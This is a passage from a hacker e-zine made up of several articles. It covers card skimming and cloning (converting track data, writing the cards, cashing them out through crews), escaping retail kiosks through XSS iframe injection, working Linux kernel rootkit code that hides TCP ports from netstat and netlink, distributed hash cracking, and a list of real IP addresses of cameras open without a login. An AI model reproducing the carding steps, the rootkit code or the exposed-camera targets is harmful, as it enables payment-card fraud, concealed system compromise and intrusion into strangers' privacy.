attacker wishing to purchase a chipped/flashed POS terminal will expect to pay $1000. All dumps are encrypted, with the seller holding the encryption key. This forces the buyer to return to the seller, send the encrypted file, and in return, receive only a percentage of the original skimmed cards. Alternatively, these skimmers can be bought out for as much as $3,000-10,000. [[ Obtaining Track Data Through Malware ]] -------------------------------------- Although rare, ATM malware is an uprising issue among those in the carding community. After the success of the Diebold Ghost trojan, there have been countless requests and confirmations of development for malware designed on specific platforms, namely the Windows CE environment, a favourite among ATM systems. This malware will effectively log all read card data and PINs, printing them to a file encrypted by the malware for later collection. Alternatively, some variants have even offered to print off all stolen credentials in a 'bank statement' format by using the ATM's printer. Needless to say, the deployment of this malware originates from an insider, usually employed or hired by the criminals to infect the ATM system from an ATM technician role. [[ Converting Track Data ]] ----------------------- Track 2 Data will often appear in the following format: 5281169568596016=14101010000045100001 ^ ^^ ^ ^--CVV | || | Card number _||_ Service code | | Field separator Expiration date Where: 5281169568596016 = credit card number 14 = expiry year 10 = expiry month 101 = service code 451 = CVV To generate Track 1 information from a Track 2 field, one must follow these simple steps: 1. Add a 'B' before the credit card number. 2. Replace the '=' with '^LASTNAME/FIRSTNAME^'. 3. Add six '0's after the T2 data. Thus, our outputted Track1 data should read as follows: B5281169568596016^LASTNAME/FIRSTNAME^14101010000045100001000000 [[ Writing Track Data ]] -------------------- Once both Track 1 and Track 2 fields are complete, the data is ready for writing to the blank medium. An attacker will ensure that the medium (magnetic stripe card) he/she selects is of high quality printing. Services offered typically cost around $15 per card. If the attacker is running a large operation then he/she may even purchase the printing equipment themself. This is comprised of: - Hi-Co Magnetic Stripe PVC Cards - PVC Printer (Zebra printers are well known for this purpose) - PVC card embosser (to emboss credentials on the card) - PVC card tipper (to tip the embossing with silver/gold) - Signature Panels (on the reverse of the card, often left out by inexperienced carders) - Holograms (typically stickers or hot-roll stamps) The magnetic stripe medium MUST be Hi-Co. Hi-Co stands for High Coercivity. This is the magnetic power that allows the writing of data to occur on Hi-Co cards. All credit/bank cards will be Hi-Co and, thus, need the appropriate device to be written to. Any device capable of writing at the coercivity of 4000 Oersted (Oe) on the appropriate tracks will be suitable. Note that most standard magstripe readers can read Hi-Co cards; coercivity only comes into question in the writing process. The most common magnetic stripe Hi-Co writer is the MSR-206 and MSR-606. The supplied software packages that come with these writers are extremely easy to operate, and it is only a matter of copying and pasting the Track 1 and Track 2 data into the blank track fields, hitting 'write', and swiping the blank card through the writer. [[ Cashing Track Data ]] -------------------- After this initial attack is complete, the attacker has two options to produce profit: 1. Form a crew to work with, willing to cash out this data. Higher risk of law enforcement, lower risk of being scammed by those you work with. 2. Work with existing crews, often overseas. Lower risk of law enforcement, higher risk of being scammed by those you work with. Existing crews work on a percentage basis, normally offering a high percentage to the card supplier, and if cash out is successful, will either return that percentage through Western Union or run with the money. Typically, 'test cards' will be exchanged in order for these crews to prove their authenticity. Forming a crew usually means a localized operation, susceptible to investigation from local authorities before any foreign law enforcement bodies are involved. I believe most crews will operate in this manner, a localised crew, often employed by a gang or mafia to supply card data to their superiors for resale (such as those sold online) or cashed out by a second team. [[ Conclusion ]] ------------ Through my experiences investigating the darker parts of the Internet, specifically carding and fraud, trends show that vendors of card data and/or information tend to be from a Russian source. It is my belief that the operations involved in the obtaining and distribution of this information is largely mafia-based. I hope the information contained within this paper is enough to deter people from the 'carding scene' rather than to take an interest in it for personal gain. The people involved are generally small fish, but around every large forum I have visited there are people with connections I'd dare not to cross. [==================================================================================================] -=[ 0x06 Brief Notes on Retail Kiosk Hacking -=[ Author: storm -=[ Email: storm@gonullyourself.org -=[ Website: http://gonullyourself.org/ If you've ever left your basement and ventured outside to the real world, you've more than likely come into contact with a kiosk at some point in a store or hotel. Most kiosks provide only a limited keyboard or run a very stripped down version of Windows, rendering certain actions difficult or impossible to directly achieve, but that only makes it all the more fun. This is no means an exhaustive article on hacking retail kiosks, but instead a list of little tips and tricks I've compiled through my own personal experiences that may either help you or provide inspiration when approaching a new device. In the MSP airport, there is a kiosk running software called SiteKiosk. The device provides Internet access at outrageous prices ($20/hour), although complimentary access to the airport's website and Weather.com is so thoughtfully offered. As I sit typing this, my plane has been delayed about 3.5 hours due to the torrents of snow outside, so I figured messing with the kiosk would give me something to do other than eating candy and futilely waiting for the Boingo hotspot page to load. The keyboard is clunky and missing sensitive keys like Ctrl and Alt; the mouse is a trackball with two buttons, though the right-click button seems unresponsive. The web browser used by this kiosk looks very much like a version of Internet Explorer themed with cleaner icons, and the file bar and taskbar are hidden from view. With buttons like Ctrl and Alt missing or disabled, we obviously can't try special key combinations like Ctrl+Alt+Del, so the first step is to poke around what we can do with the software. The fact that we can access the airport's website and Weather.com is very curious, especially since the advertisements load fine (which are hosted on third-party servers), yet putting anything in the URL bar pops up a "please insert monies" box. Luckily, Weather.com has an XSS in their quick lookup, so a simple search for zip code injects an IFrame into the page, displaying our coveted search engine. When a kiosk disallows access to the URL bar, whether it's trying to contain the user to a single web site (think the online catalog at Staples stores) or reduce functionality (until the user forks up their money), XSS is a good place to start. It is common enough that even if you don't come prepared with a known XSS in the target website, it's usually a trivial matter to find one on the spot. By injecting an IFrame, we gain the ability to browse any site we wish, as well as exercise other web browser functionality that may escalate our access, provide opportunity to escalate our access, or provide further information about the box. At this point, we have achieved free Internet access (within the IFrame), but there are more interesting things to do other than reading Reddit. A simple search for ha.ckers.org's iKat suite leads us to a swiss army knife of tools to probe the system we're on. Through this, we learn that our user-agent is: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; SiteKiosk 6.6 Build 213) We can browse the filesystem by invoking the "Browse" form field, but unfortunately lack of right- click doesn't let us easily open files and execute programs. If right-click were enabled, we would be able to browse to C:\Windows\system32\cmd.exe within the prompt, right-click the program, and select open to spawn a shell. Explorer.exe is also another good place to start. Once cmd.exe is open, we would be able to manipulate the system, probe local files or scan the network, or kill the kiosk software using `tasklist` and `taskkill`. Unfortunately, the ability to view My Computer also seemed disabled. I did not spend a large amount of time probing the system or enumerating all of the tools provided by iKat, but I did discover the existence of a file named trust-root.p7b on the Desktop which looked interesting, along with a shortcut to the SiteKiosk software. In a separate escapade, I was lucky enough to come across an Internet/printing kiosk in the lobby of a Marriott hotel provided by a company called iBAHN. If I recall correctly, this too was running SiteKiosk, but the interface looked very different than the kiosk I encountered in MSP, and it provided a range of additional functions such as printing and access to Microsoft Office. The device seemed to take great care not to give too much access to the user (the software provided its own, more limited filesystem browser that was meant to open documents from flash drives), but it wasn't perfect. By opening Microsoft Word, you could access Windows Explorer through the File menu or navigating the help bar in online mode, right-clicking and selecting "View Source". This would invoke Notepad with a File menu of its own. Viewing My Computer only showed the CD drive and USB stick that was currently plugged in, but it was possible to access C:\ simply by typing it in the navigation bar. There are plenty of kiosks around to play with, and many of them possess blatant holes in their access restriction software. Even if there is nothing inherently interesting on the device, it might be a good idea to check if it's connected to the network or if it dials home anywhere. Just in general, it's fun to circumvent the software and snoop about the device, and of course things like free Internet are always cool too. Some devices I've seen think they are clever, or are just unstable, so working or reliable methods of accessing certain kiosks, such as the ones in Barnes & Noble, are still to be determined. For instance, attempting to XSS the B&N website from their in- store kiosk results in the device locking up and calling for employee assistance. Other devices disable right-click, removing certain escalation opportunity and the ability to access critical functionality necessary for an attack. There is still much fun to be had, so if you have any tips, tricks, or your own kiosk-hacking stories, drop us a message and your submission might just be in the next zine. [==================================================================================================] -=[ 0x07 Linux Rootkit Development Update -=[ Author: duper -=[ Website: http://projects.ext.haxnet.org/~super/ In the Linux kernel version 2.6.36, some changes to the procfs API will break the interface that previously existing rootkits have with /proc/net/tcp. This is a critical change as far as rootkit functionality goes, since a new technique is required to hide TCP ports from userland administration programs such as netstat(8) and other network statistics gathering tools. Thanks to fawx for initially bringing this issue to my attention. As a side note: If you have any questions about the intricacies of the Linux kernel, as we will be working closely with it throughout the course of this paper, consult /usr/src/linux/Documentation or any of the links provided as references at the bottom. Prior to release of the 2.6.36 patch, most Linux rootkits utilized a sequential search of the proc_net->subdir linked list to locate the procfs data structure corresponding to the filesystem pathname /proc/net/tcp. The way that entries in the /proc/net directory are accessed changed in 2.6.36, and as a result the majority of publicly available Linux rootkits featuring TCP connection hiding stopped compiling; some benign networking drivers ceased to function as well. The API wasn't changed in order to safeguard against rootkits -- that was only an unintended side effect. In reality, implementing a kernel-mode TCP data filtering mechanism is even easier with the new interface. A new kernel function is dedicated specifically to the purpose of initializing the /proc/net/tcp file. Note that I'm using the term "file" loosely in this context, as procfs doesn't behave like a typical filesystem that utilizes disk-based storage. In userland, when a file descriptor corresponding to a procfs pathname is read(), the results are actually custom-formatted kernel data objects. That's why /proc/net/tcp and, in fact, the majority of procfs pathnames, appear as empty files when the stat() system call is executed on them. Although procfs files do have inodes, their values approach 2**32 (the upper limit for ino_t), and thus they are outside the range of use for partitioned disk filesystems. Observe the differences in output between the following two commands: $ stat /proc/net/tcp File: `/proc/net/tcp' Size: 0 Blocks: 0 IO Block: 1024 regular empty file Device: 3h/3d Inode: 4026531957 Links: 1 Access: (0444/-r--r--r--) Uid: ( 0/ root) Gid: ( 0/ root) Access: 2011-02-19 12:16:32.853287891 -0500 Modify: 2011-02-19 12:16:32.853287891 -0500 Change: 2011-02-19 12:16:32.853287891 -0500 Birth: - $ stat /bin/ls File: `/bin/ls' Size: 109736 Blocks: 224 IO Block: 4096 regular file Device: 303h/771d Inode: 7660308 Links: 1 Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root) Access: 2010-12-25 23:33:12.000000000 -0500 Modify: 2010-12-24 12:18:47.000000000 -0500 Change: 2010-12-24 12:19:01.000000000 -0500 Birth: - As you can see, the procfs pathname has a rather large inode number and a file size of 0, despite the fact that we would receive data back if we ran `cat` against it. In the preceding examples, the /usr/bin/stat binary (provided by the GNU coreutils package) executed the fstat() system call against the the absolute pathnames given as arguments. In this next typescript, statfs() will be run due to the "-f" command line option, which is an abbreviated form of the getopt_long() option "--file-system", as documented in the stat(1) man page and GNU info pages. $ stat -f /boot File: "/boot" ID: f6c5e14bf02df87f Namelen: 255 Type: ext2/ext3 Block size: 1024 Fundamental block size: 1024 Blocks: Total: 32175 Free: 11084 Available: 9423 Inodes: Total: 8320 Free: 8266 $ stat -f /proc File: "/proc" ID: 0 Namelen: 255 Type: proc Block size: 4096 Fundamental block size: 4096 Blocks: Total: 0 Free: 0 Available: 0 Inodes: Total: 0 Free: 0 Clearly, procfs is special since the majority of its statistical information is zeroed out. The glaring contrast in block size results from extfs handling disk blocks, whereas procfs handles memory, as stated previously. On my x86-64 kernel, getpagesize() from unistd.h returns 4096. However, page size is platform independent, so your mileage may vary. Note that sysfs behaves in a manner identical to procfs according to statfs(). If your kernel is configured to support sysfs, you'll find it listed under /sys in your /etc/mtab. The directory that rootkit developers would probably want to concern themselves the most with is /sys/kernel. Again, depending on your /usr/src/linux/.config or /proc/config.gz settings during the kernel's compile-time, various subdirectories could be available under /sys/kernel. My machine has the debug, security, and mm (memory manager) directories enabled currently. Now that we've gotten the basics squared away, let's take a look at a rootkit.. struct proc_dir_entry *proc_find_tcp() { struct proc_dir_entry *p = proc_net->subdir; while (strcmp(p->name, "tcp")) p = p->next; return p; } This is from adore-ng-0.56, a rootkit I downloaded from packetstormsecurity.org. The code above shows the tediousness involved in accessing pathnames under the /proc/net directory. Since the kernel didn't have any direct access functions defined, it became necessary to loop over the directory entries manually. The last kernel version to be supported by this particular adore-ng release appears to be 2.6.16, judging by some conditional preprocessor directives within the source: #if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,16) MODULE_PARM(root_fs, "s"); MODULE_PARM(proc_fs, "s"); MODULE_PARM(opt_fs, "s"); #else module_param(root_fs, charp, 0644); module_param(proc_fs, charp, 0644); module_param(opt_fs, charp, 0644); #endif It looks as if prior to 2.6.16 there was less convenient syntax available for those developing Loadable Kernel Modules (LKMs). At the time of writing this article, the latest stable Linux kernel is 2.6.37.1. However, I'll be using gentoo-sources-2.6.37 from the Gentoo portage tree. For the sake of consistency, let's double check the current kernel versions: $ finger @kernel.org [kernel.org] The latest linux-next version of the Linux kernel is: next-20110218 The latest snapshot 2.6 version of the Linux kernel is: 2.6.38-rc5-git5 The latest mainline 2.6 version of the Linux kernel is: 2.6.38-rc5 The latest stable 2.6.37 version of the Linux kernel is: 2.6.37.1 The latest stable 2.6.36 version of the Linux kernel is: 2.6.36.4 The latest longterm 2.6.35 version of the Linux kernel is: 2.6.35.11 The latest stable 2.6.35 version of the Linux kernel is: 2.6.35.9 The latest longterm 2.6.34 version of the Linux kernel is: 2.6.34.8 The latest stable 2.6.34 version of the Linux kernel is: 2.6.34.7 The latest longterm 2.6.32 version of the Linux kernel is: 2.6.32.29 The latest stable 2.6.32 version of the Linux kernel is: 2.6.32.28 The latest longterm 2.6.27 version of the Linux kernel is: 2.6.27.58 The latest stable 2.6.27 version of the Linux kernel is: 2.6.27.57 The latest stable 2.4.37 version of the Linux kernel is: 2.4.37.11 In 2.6.36, the pointer to the global proc_net structure variable (seen in the adore-ng-0.56 code above) disappeared. After grepping around through the kernel source code a bit, I realized that the functionality had been so heavily modified that I wasn't sure where to hook into /proc/net/tcp from. I was able to grep /boot/System.map for procfs-related symbols and realized it was going to be a lot easier than I thought. I found a tcp_proc_register function that allowed me to re-create /proc/net/tcp. Also, the proc_net structure that was being referenced by adore-ng had now become init_net. So, I simply deleted the existing /proc/net/tcp with proc_net_remove and re-initialized it with the address of a custom struct (just to clarify, we are right now working inside the kernel): static struct tcp_seq_afinfo tcp4_seq_afinfo = { .name = "tcp", .family = AF_INET, .seq_fops = {.owner = THIS_MODULE}, .seq_ops = {.show = new_tcp4_seq_show} }; To understand what's going on here, one needs to realize that procfs makes itself appear to userland as any other filesystem would. It exposes various functions for operating on the files and directories themselves, e.g., open, read, readdir, seek, etc. That's where the new_tcp4_seq_show function comes in. The relative pathname to the file where the real tcp4_seq_show is defined is net/ipv4/tcp_ipv4.c (as documented by Documentation/networking/proc_net_tcp.txt). The new_tcp4_seq_show function is a malicious wrapper which invokes the legitimate tcp4_seq_show function, unless it's determined that the TCP connection currently being processed by a read operation on /proc/net/tcp corresponds to a port number that is intended to be hidden by the rootkit. In that case, new_tcp4_seq_show will not construct the usual hexadecimal-encoded string that describes the connection. static int (*old_tcp4_seq_show)(struct seq_file *seq , void *v) = 0; // Array initialization syntax must be zero-terminated static const unsigned short hidden_ports[] = {6666, 7777, 888, 999, 0}; static int new_tcp4_seq_show(struct seq_file *seq, void *v) { const signed int retval = old_tcp_seq_show(seq, v); register unsigned short i = 0; static unsigned int line = 0; auto char hex_port[8] = { 0 }, *offset = seq->buf + seq->count - NET_LINE; if(v == SEQ_START_TOKEN) return line = 0, retval; for(i = 0;hidden_ports[i];i++) { sprintf(hex_port, ":%04X", hidden_ports[i]); if(strstr(offset, hex_port)) return seq->count -= NET_LINE, retval; } sprintf(offset, "% 4i", line++); return offset[4] = ':', retval; } The old_tcp_seq_show identifier is simply a function pointer to the original tcp4_seq_show function that was assigned to the .seq_ops member of the tcp_seq_afinfo structure, whose definition was shown above. To reiterate, our new_tcp4_seq_show function is wrapping the real tcp4_seq_show function. The introduction of our wrapper function to the traditional kernel control flow effectively hides certain ports from userland by looping over an array that contains the rogue port numbers. In this way, running a command such as netstat will not display the TCP connections that have been hidden from /proc/net/tcp. The hidden_ports array is specified with the C language keywords "static" and "const." These prevent the initialized port numbers from being accessed from outside of the current source file and from having the values modified after compilation. Also, the hidden_ports array is defined to be of type "unsigned short" because the source and destination port fields in TCP packet headers are non- negative and 16 bits wide. Section 3.1 of RFC793 demonstrates this with an ASCII art representation. 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Source Port | Destination Port | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Now, to formally register our new /proc/net/tcp mechanisms, we first remove the original, then pass pointers to the data structures representing the /proc/net directory and our new tcp entry within it. Simply invoke the appropriate functions when initializing the Loadable Kernel Module. The module_init macro tells the compiler which function to execute when using insmod on the compiled .ko (kernel object) code file. static int __init init_hidetcp(void) { proc_net_remove(&init_net, "tcp"); tcp_proc_register(&init_net, &tcp4_seq_afinfo); return 0; } module_init(init_hidetcp); Let's go ahead and test it out to make sure everything works. After compiling the rootkit itself with GNU make and inserting the module into the kernel, we'll use netstat with the "-tW" command line flags so only TCP connections are displayed and the wide display format will allow us to view DNS hostnames in their entirety. One of the hidden port numbers we defined in the hidden_ports array was 7777 so let's see if netstat detects a connection on that port. $ gmake $ insmod hidetcp.ko $ telnet us.undernet.org 7777 Trying 208.83.20.130... Connected to us.undernet.org Escape character is '^]'. ^] telnet> z [1]+ Stopped telnet us.undernet.org 7777 $ netstat -tW Active Internet connections (w/o servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 alien.localdomain:51889 please.dont.hacktheinter.net:6697 ESTABLISHED $ So far, we've seen how to hide TCP connections to or from certain port numbers from userland programs that read from procfs. However, there's another way to access information about TCP connections using rtnetlink(3). You can determine if a given program is using procfs or a netlink protocol by tracing for the respective function calls. $ whatis netlink netlink (3) - Netlink macros netlink (7) - Communication between kernel and userspace (AF_NETLINK) $ strace -fe trace=open,socket netstat -tW 2>&1 > /dev/null | egrep -i '(tcp|netlink)' open("/proc/net/tcp", O_RDONLY) = 3 open("/proc/net/tcp6", O_RDONLY) = -1 ENOENT (No such file or directory) $ strace -fe trace=open,socket ./ss 2>&1 > /dev/null | egrep -i '(tcp|netlink)' socket(PF_NETLINK, SOCK_RAW, 4) = 3 The ss binary being traced above is a piece of code distributed with iproute2 that retrieves socket statistics. Iproute2 has a Wikipedia article at http://en.wikipedia.org/wiki/Iproute2 with some helpful links to get you up to speed. Some have probably noticed that the raw socket option is succeeding despite the fact that my current prompt setting reflects that of a non-root user. Since the PF_NETLINK integer constant is the first argument instead of PF_INET, the kernel has no issue with providing a positive return value. Please note that rtnetlink isn't the only netlink protocol in existence -- there are many more; far too many to mention here. There have been many academic research papers published on the subject of netlink over the past decade or so. One of the latest and most interesting is entitled "Communicating between the kernel and user-space in Linux using Netlink sockets" by Ayuso, Gasca and Lefevre. The types of security-related operations it's capable of performing alone are extremely comprehensive. For instance: detecting and mitigating DDoS attacks, subliminal channels between processes with disparate privileges, multicasting a single communications channel to multiple system users, implementing a dynamic routing protocol like Open Shortest Path First in userland, detecting network interfaces with promiscuous mode enabled, etc. In this particular scenario, usage of only a specific aspect of netlink is necessary to accomplish the final goal of TCP connectivity that's as low-key as possible. Since connections hidden from /proc/net/tcp can still be viewed via the netlink socket interface, another technique must be used to avoid such disclosure. Here's another example typescript (`man script`) of the ss program from the misc directory in iproute2's source tree as it executes on the standard output stream: $ ./ss State Recv-Q Send-Q Local Address:Port Peer Address:Port ESTAB 0 0 192.168.1.100:56921 72.14.204.147:80 ESTAB 0 0 192.168.1.100:51237 184.27.36.110:22 In this case, the two TCP sockets listed are both in a connection established state. The four empty message queue values being shown mean that the kernel has delivered all pending data transmissions to and from the socket as of the current runtime. The code that handles Internet diagnostics monitoring for the Linux kernel's rtnetlink protocol is located in /usr/src/linux/net/ipv4/inet_diag.c, and /usr/src/linux/include/linux/inet_diag.h is of course the associated header file. TCP-specific code is located elsewhere. However, we can simply disable all TCP socket diagnostics without referencing any of the tcp_inet_diag oriented source files. The following short code snippet inserted into the rootkit module's initialization function is sufficient to prevent netlink from utilizing any TCP socket monitoring methods whatsoever: static struct inet_diag_handler h; h.idiag_type = TCPDIAG_GETSOCK; inet_diag_unregister(&h); Don't forget to include linux/inet_diag.h. Now iproute2's ss binary won't output any TCP connections at all, since the handler responsible for the message type it was processing has now been removed. It works, but it would be even better by only allowing Internet socket diagnostics for connections whose source and destination port numbers don't match our blacklist. The full inet_diag_handler structure must be filled out, and inet_diag_register should be invoked as well. This is similar to passing the tcp_seq_afinfo structure to tcp_proc_register as outlined in the previous technique. A brief outline tracing nested structure members back to actual port values follows. However, putting that concept into compilable rootkit source code form will be left as an exercise for the reader. include/net/inet_sock.h 112 struct inet_sock { 113 __be16 inet_dport; 114 __be16 inet_sport; 115 } include/net/inet_connection_sock.h 86 struct inet_connection_sock { 87 /* inet_sock has to be the first member! */ 88 struct inet_sock icsk_inet; include/linux/tcp.h 292 struct tcp_sock { 293 /* inet_connection_sock has to be the first member of tcp_sock */ 294 struct inet_connection_sock inet_conn; net/ipv4/tcp_diag.c 20 static void tcp_diag_get_info(struct sock *sk, struct inet_diag_msg *r, 21 void *_info) 22 { 23 const struct tcp_sock *tp = tcp_sk(sk); For more information on Linux kernel development, check out: - The Linux Kernel Newbies site http://kernelnewbies.org/ - The linux-kernel mailing list FAQ http://www.tux.org/lkml/ - The Linux Kernel Hackers' Guide from the Linux Documentation Project http://tldp.org/LDP/khg/HyperNews/get/khg.html (highly recommended) - And, of course, the main Linux Kernel Archives site http://kernel.org [==================================================================================================] -=[ 0x08 High Performance Hash Cracking with MapReduce, Part 2 -=[ Author: elchupathingy -=[ IRC: irc.gonullyourself.org #gny /---------------------------------------------------------------------------------------- | | Introduction | The last article talked about the basic theory of MapReduce and a few examples of how it can be used. The options for MapReduce are not limited to those mentioned, but they are the easiest ones to understand the concept of breaking up larger tasks and passing this information on to other nodes. For this article, we will focus more on the code aspect of MapReduce instead of the higher- level concepts. /---------------------------------------------------------------------------------------- | | Background | The very basic implementation of MapReduce shown here is something that can be expanded upon easily. It provides the method of automatic data pre-processing and automatic post-processing. But, being a simple implementation, there are problems with some of the mechanics inside the code. Though, that is left to someone else to fix. By familiarizing yourself with the algorithm, and stepping through the code, it should be a trivial manner to have yourself a fully functioning MapReduce implementation. /---------------------------------------------------------------------------------------- | | Theory | To recap: The idea behind MapReduce is quite simple to grasp, but its layout is detailed and may lead to confusion at times. Here is a look at a typical layout of a MapReduce network: /----------------------------------------------\ /------\ | | | | | | |Master|----/ /------\ /------\ /------\ /------\ /------\ \------/ |Mapper| |Mapper| |Mapper| |Mapper| |Mapper| \------/ \------/ \------/ \------/ \------/ | | | | | | | | | | /-------\ /-------\ /-------\ /-------\ /-------\ |Reducer| |Reducer| |Reducer| |Reducer| |Reducer| \-------/ \-------/ \-------/ \-------/ \-------/ | | | | | \ \ | / / \ \ | / / \ \ | / / \ \ | / / \ \ | / / \ \ | / / \ \ | / / \ \ | / / \ \ | / / \ \|/ / \ | / \-----------------/ | /---------\ |Answer!!!| \---------/ Now that's a picture. This network layout has two key characteristics to it: 1) Series of Mappers 2) Series of Reducers These two things are the meat of the MapReduce concept. Now, what exactly is MapReduce? It's formally defined as the following: /------------------------------------------------------------------------------------ |MapReduce is a framework for processing huge datasets on certain kinds of |distributable problems using a large number of computers (nodes), collectively |referred to as a cluster. Computational processing can occur on data stored either |in a filesystem (unstructured) or within a database (structured). | - Wikipedia Now that that's out of the way, lets move onto real code and see how this works in the given implementation. Firstly, what software is providing the backend infrastructure? The implementation relies on the following: Web server: Apache or whatever you have as long as it supports PHP. MySQL That's it. The clients run from php-cli but can also be called by the web server if desired. The MySQL tables that the scripts interact with are very simple: /------------------------------------------------------------------------------------ | CREATE TABLE IF NOT EXISTS `node` ( | `id` varchar(32) NOT NULL, | `type` int(11) NOT NULL, | `job_id` varchar(32) NOT NULL, | `last_connect` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, | UNIQUE KEY `id` (`id`) | ) ENGINE=MyISAM DEFAULT CHARSET=latin1; | | CREATE TABLE IF NOT EXISTS `job` ( | `id` varchar(32) NOT NULL, | `status` int(11) NOT NULL, | `time_added` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, | `mappers` int(11) NOT NULL, | `reducers` int(11) NOT NULL, | `time_started` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00', | PRIMARY KEY (`id`) | ) ENGINE=MyISAM DEFAULT CHARSET=latin1; | These tables provide the necessary framework for this given implementation, while demonstrating simple MapReduce structure in an obvious yet functional manner. Should MapReduce be used in a production environment, a more efficient, scientifically-designed framework should be used. High performance applications should most likely not be using an interpreted language, additionally. Obviously, these tables are of no use without the scripts that interact with the database. The main script that facilitates this interaction is 'stat.php'. It provides a vector for the nodes to talk with the master, in most cases, it keeps track of the nodes' last connect time and assigns the job of either 'mapper' or 'reducer' to each. The code is straightforward, and the source code should be relatively self-explanatory by scanning over it. So, the next step is to determine the method of relaying data between master and node. The data is structured in EL markup files, which look suspiciously similar to existing markup languages like HTML and XML: /------------------------------------------------------------------------------------ | | ec366edc8a513f467af89f2e5cd9f37a | SET | | 85103e20ac8441af181b15f58fc53b08 | | | The "id" tag contains the ID of the node. The "type" tag tells the node to perform a specific action, in this case, to set its "job_id" to the payload. The "payload" tag holds the data that will be assigned to a variable stored on the node. It is named such that the variable is assigned correctly. In this particular packet, the information between the opening and closing "payload" tags is an MD5 hash, though it does not always have to be. However, protocol defines that the payload must only be alphanumeric (only contains numbers or letters). If the "type" tag is set to "FILE", then the payload should be treated as Base64-encoded data. This protocol is simple but allows for easy parsing and greater flexibility. Here is an example handshake performed between node and master. This handshake is initiated by a node upon startup to seek new jobs: /---------------------------------------------------------------------------------------------\ |http://127.0.0.1/map_reduce_zine/stat.php?id=ec366edc8a513f467af89f2e5cd9f37a&status=starting| \---------------------------------------------------------------------------------------------/ | | /-------------------------------------------------\ | | | ec366edc8a513f467af89f2e5cd9f37a | | REQUEST |-----------------------\ | | | \-------------------------------------------------/ | | | /--------------------------------------------------------------------------------------------\ |http://127.0.0.1/map_reduce_zine/stat.php?id=ec366edc8a513f467af89f2e5cd9f37a&status=whatami| \--------------------------------------------------------------------------------------------/ | | /-------------------------------------------------\ | | | ec366edc8a513f467af89f2e5cd9f37a | | SET | | | | reducer |-----------------------\ | | | | | | \-------------------------------------------------/ | | | /--------------------------------------------------------------------------------------------\ |http://127.0.0.1/map_reduce_zine/stat.php?id=ec366edc8a513f467af89f2e5cd9f37a&status=looking| \--------------------------------------------------------------------------------------------/ | | /-------------------------------------------------\ | | | ec366edc8a513f467af89f2e5cd9f37a | | SET | | | | 85103e20ac8441af181b15f58fc53b08 | | | | | \-------------------------------------------------/ Once the node has received a job, it will send another request to the master for the script and data files. The job files, which contain the split up work, are then stored in a folder specific to that job_id. To retrieve jobs files from the folder, the follow script is used: /------------------------------------------------------------------------------------ |#job_chunks.php |$dir = opendir( "./chunks/$job_id" ); | |if( $dir ) |{ | do | { | $thing = readdir( $dir ); | | if( $thing == FALSE ) | { | rmdir( "./chunks/$jobs_id" ); | die; | } | | if( $thing == "." || $thing == ".." ) | continue; | else | break; | | }while( true ); | | if( $thing && $thing != "." && $thing != ".." ) | { | $output = "\r\n"; | $output .= "\t$id\r\n"; | $output .= "\tFILE\r\n"; | $output .= "\t\r\n"; | $output .= "\t\t".base64_encode( file_get_contents( "./chunks/$job_id/$thing" ) )."\r\n"; | $output .= "\t\r\n"; | $output .= ""; | unlink( "./chunks/$job_id/$thing" ); | closedir( $dir ); | echo $output; | } |} | This code grabs the next chunk from the directory and wraps it as a EL packet, where the output is then sent to the node. From here, mapper nodes will process this chunk of data and start a small, one-time use web server. The reducer nodes request the IP:PORT of a mapper node, grabbing the result. After doing so, they further process the data and upload their results to the master. The master does a final reduction step on the reduced results and produces a final, usable result that is downloaded by the administrator. Although very much functional, the implementation that is given with this article possesses a few inherent issues: 1) If a node does not complete a job, then that node's results are lost. 2) There is no redundancy of nodes. 3) The code as a whole was not written with security in mind. Testing should only be performed on a private network. 4) It uses HTTP to transfer messages, which makes the code easy to write in exchange for introducing an enormous amount of overhead. 5) Speed gains from distributing the cracking process among multiple nodes is negated by the fact that nodes request chunks more quickly than other nodes are able to download them, resulting in multiple nodes receiving the same chunk. Requesting a chunk is not a "blocking" operation. This resulted in a dirty code hack using random sleep times. With that being said, this project still serves as a good learning tool to those interested in the MapReduce algorithm. Download the source package for this article: http://www.gonullyourself.org/zine/4/MapReduce.tar.gz MD5sum: d985ffa4b2fcd63d2a6275697acf252e SHA1sum: fb798594216e87b51fd194db1a31e580ebe47a7d A few things need to be done first before testing this code. First, the config.ini files should be updated to point to the URL of your web server and the folder the MapReduce code is installed in. The default is "http://127.0.0.1/map_reduce_zine". Once the configs have been updated correctly, the nodes are ready to run; however, the master must be set up first. Import and create the tables in map_reduce.sql. To make sure the master runs without problems, just be lazy and chmod 777 all the directories. For what we're doing, it really doesn't matter. Now, all the configurations are complete. To test the MapReduce cluster, initialize two or more nodes locally by running the "client.php" file in each of the "testing" folders. Once they are running, they will begin to poll the master for work. To add a job to the cluster, navigate to "add_job.php" in your browser. From here, add the corresponding files from the "example" directory. Once a job is added, the nodes will automatically grab the work script and any data needed to perform the job. Once the nodes are done with their work, they will begin to poll for new jobs. The example scripts and data are to find the plain text string "elchupathingy" from the hash in the "node_script.php". To see if it worked, browse to "show_results.php" and select the link there; it will run the "post-process" script and, in this case, display the plain text. lata, ELChupathingy [==================================================================================================] -=[ 0x09 Camera/DVR Scan -=[ Author: storm -=[ Email: storm@gonullyourself.org -=[ Website: http://gonullyourself.org/ Oh, the joys of nmap. Open access (no login) ---------------------- http://165.98.238.72/view/index.shtml http://165.98.238.75/view/index.shtml http://165.98.238.78/view/index.shtml http://186.1.14.117/view/index.shtml http://24.1.5.61:8082/Simple/index.htm http://24.1.10.154:81/ http://24.1.12.248:1028/ http://24.1.26.48/img/main.cgi?next_file=main.htm http://72.250.135.252:1024/img/image.cgi?next_file=main_fs.htm http://74.237.69.5/main.cgi?next_file=main.htm 